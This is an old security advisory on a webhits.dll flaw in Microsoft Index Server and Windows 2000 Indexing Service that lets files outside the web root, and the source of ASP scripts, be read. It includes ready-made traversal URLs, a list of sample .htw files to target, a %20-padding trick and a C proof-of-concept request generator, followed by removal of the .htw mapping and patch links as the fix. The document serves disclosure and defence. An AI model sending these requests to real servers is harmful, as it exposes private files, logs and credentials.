COMMAND
Webhits.dll
SYSTEMS AFFECTED
Index Server 2, Indexing Service in Windows 2000
PROBLEM
David Litchfield found following. Internet Information Server 4.0
ships with an ISAPI application webhits.dll that provides
hit-highlighting functionality for Index Server. Files that have
the extention .htw are dispatched by webhits.dll.
A vulnerability exists in webhits however that allows an attacker
to break out of the web virtual root file system and gain
unathorized access to other files on the same logical disk drive,
such as customer databases, log files or any file they know or
can ascertain the path to. The same vulnerability can be used to
obtain the source of Active Server Pages or any other server side
script file which often contain UserIDs and passwords as well as
other sensitive information.
Even if you have no .htw files on your system you're probably
still vulnerable! A quick test to show if you are vulnerable: go
to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you
receive a message stating the "format of the QUERY_STRING is
invalid" you _are_ vulnerable. This test is to see if you're
vulnerable _before_ you apply the patch. After you install the
patch you _will_still get the same message. Cerberus Information
Security's free vulnerability scanner - CIS - now contains a check
for this issue - available from the website
http://www.cerberus-infosec.co.uk/
This vulnerability exploits two problems and for the sake of
clarity this section will be spilt into two.
1) If you DO have .htw files on your system
*******************************************
The hit-highlighting functionality provided by Index Server allows
a web user to have a document returned with their original search
terms highlighted on the page. The name of the document is passed
to the .htw file with the CiWebHitsFile argument. webhits.dll, the
ISAPI application that deals with the request, opens the file
highlights accordingly and returns the resulting page. Because
the user has control of the CiWebHitsFile argument passed to the
.htw file they can request pretty much anything they want. A
secondary problem to this is the source of ASP and other scripted
pages can be revealed too.
However, webhits.dll will follow double dots and so an attacker is
able to gain access to files outside of the web virtual root. For
example to view the web access logs for a given day the attacker
would build the following URL
http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
Sample .htw files often installed and left on the system are
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback)
2) If you DON'T have any .htw files on your system
**************************************************
To invoke the webhits.dll ISAPI application a request needs to be
made to a .htw file but if you don't have any on your web server
you might wonder why you are still vulnerable - requesting a
non-existent .htw file will fail. The trick is to be able to get
inetinfo.exe to invoke webhits.dll but then also get webhits.dll
to access an existing file. We achevie this by crafting a special
URL.
First we need a valid resource. This must be a static file such as
a .htm, .html, .txt or even a .gif or a .jpg. This will be the
file opened by webhits.dll as the template file.
Now we need to get inetinfo.exe to pass it along to webhits for
dispatch and the only way we can do this is by requesting a .htw
file.
http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
will fail. Obviously. There is no such file on the system with
that name.
Notice we've now invoked webhits, however, and by placing a
specific number of spaces (%20s) between the exisiting resource
and the .htw it is then possible to trick the web service: The
buffer that holds the name of the .htw file to open is truncated,
causing the .htw part to be removed and therefore when it comes
to webhits.dll attempting to open the file it succeeds and we are
then returned the contents of the file we want to access without
there actually being a real .htw file on the system.
The code is probably doing something similar to this:
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
Here webhits.dll "contains" a function called DoesTemplateExist()
and is passed a pointer to a 260 byte long string buffer
containing the path to the .htw file to open but this buffer is
further reduced in length by the strncpy() function removing
whatever was stored in the last ten bytes (in this case the .htw
of the HTTP REQUEST_URI) so when fopen() is called it succeeds.
This happens because Windows NT will ignore trailing spaces in a
file name.
Fredrik Widlund added following.
/*
fredrik.widlund@defcom-sec.com
example: iiscat ../../../../boot.ini
*/
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
int file_buf_size = 250;
if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) ||
(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
{
fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
exit(1);
}
file_read = argv[1];
if (argc == 3)
file_valid = argv[2];
sprintf(request, "GET %s", file_valid);
request_p = request + strlen(request);
file_buf_size -= strlen(file_valid);
while(file_buf_size)
{
strcpy(request_p, "%20");
request_p += 3;
file_buf_size--;
}
sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
puts(request);
exit(0);
}
SOLUTION
.htw needs to be unassociated from webhits.dll. To do this open
the Internet Server Manager (MMC). In the left hand pane right
click the computer you wish to administer and from the menu that
pops up choose Properties.
From the Master Properties select the WWW Service and then click
Edit. The WWW Service Master properties window should open. From
here click on the Home Directory tab and then click the
Configuration button. You should be presented with an App
Mappings tab in the Application Mappings window. Find the .htw
extention and then highlight it then click on remove. If a
confirmation window pops up selected Yes to remove. Finally click
on Apply and select all of the child nodes this should apply to
and then OK that. Now close all of the WWW Service property
windows.
Patch availability:
Index Server 2.0:
- Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
- Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
- Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726